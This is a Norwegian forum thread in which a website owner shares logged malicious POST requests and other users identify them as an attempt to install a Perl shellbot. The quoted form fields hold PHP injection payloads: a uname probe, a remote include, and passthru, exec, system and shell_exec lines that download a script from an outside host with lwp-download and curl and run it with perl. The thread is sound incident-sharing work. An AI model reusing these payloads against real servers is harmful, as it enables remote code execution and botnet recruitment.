Forsøk på hacking?

[hakonv]

Hei alle.

Jeg hører egentlig til i .Net verdenen. Det skjer fra tid til annen at det dukker opp forsøk på hacking. Og nå tikket det nettop 4 mystiske forespørsler inn på en av disse .Net sidene. Nå ble jeg litt nyskjerrig, i tillegg til at det sikkert er kjekt for noen av dere å bla litt ekstra i loggene i kveld.


Klienten identifiserer seg som "plaNETWORK Bot Search" og kommer fra 72.249.108.140 (ISP: Colo4Dallas LP , Organization: Beach Trader )
Requestene kommer som HttpPost til en gyldig aspx-side med "++%2fcontact.php" lagt til på enden av querystringen.

Formene ser slik ut (kuttet opp for enklere lesbarhet, php-Code her kommer fordi det er omkranset med PHP i brackets.):

Form 1:
send-contactus : 1
author_name :

echo('plaNETWORK ');passthru('uname -a');
echo(' kae');die();

Form2:
send-contactus : 1
author_name :

include('http://qikel.fileave.com/ingwe.txt??');
die();

Form3:
end-contactus : 1
author_name :

passthru('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;
perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
perl dos.txt');
exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
system('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
shell_exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');;
die();

Form 4:

send-contactus : 1
author_name :

passthru('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
system('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
perl dos.txt');
shell_exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');;
die();

Noen som har sett dette før?

 

[Nutz]

Helt klart forsøk på installasjon av et perl-script.
Perl:Shellbot.. mao gjør serveren din til et verktøy for for å føkke opp for andre bla.

 

[Pong]

Det er nok en ide å sende en liten epost til de som drifter fileave.com.
Filene ligger der fremdeles: FileAve.com - wan5's files

 

[Jan W.]

Om du ser litt på dette scriptet:

http://wan5.fileave.com/dos.txt

..så ser du hva som kan skje.

Crackeren har tydeligvis tatt høyde for det meste.

Om du googler navnet hans, dukker det opp litt av hvert.

 

[hakonv]

Takk for innspill

Da har jeg sendt mail til fileave.com, og bedt dem om å fjerne filene.

 

[clinton4]

Fikk virus varsel fra Norman når jeg besøkte http://wan5.fileave.com/dos.txt

 

[Nutz]

Fila er "bare" en tekstfil med perl-scriptet, det er helt avhengig av å bli startet/kjørt av "loaderen". Harmløst så lenge det ikke blir startet, og det blir det ikke bare med å trykke på den linken.
På en "normal" PC vil man ikke kunne kjøre et Perl-script, dette er nok mer målretta for servere.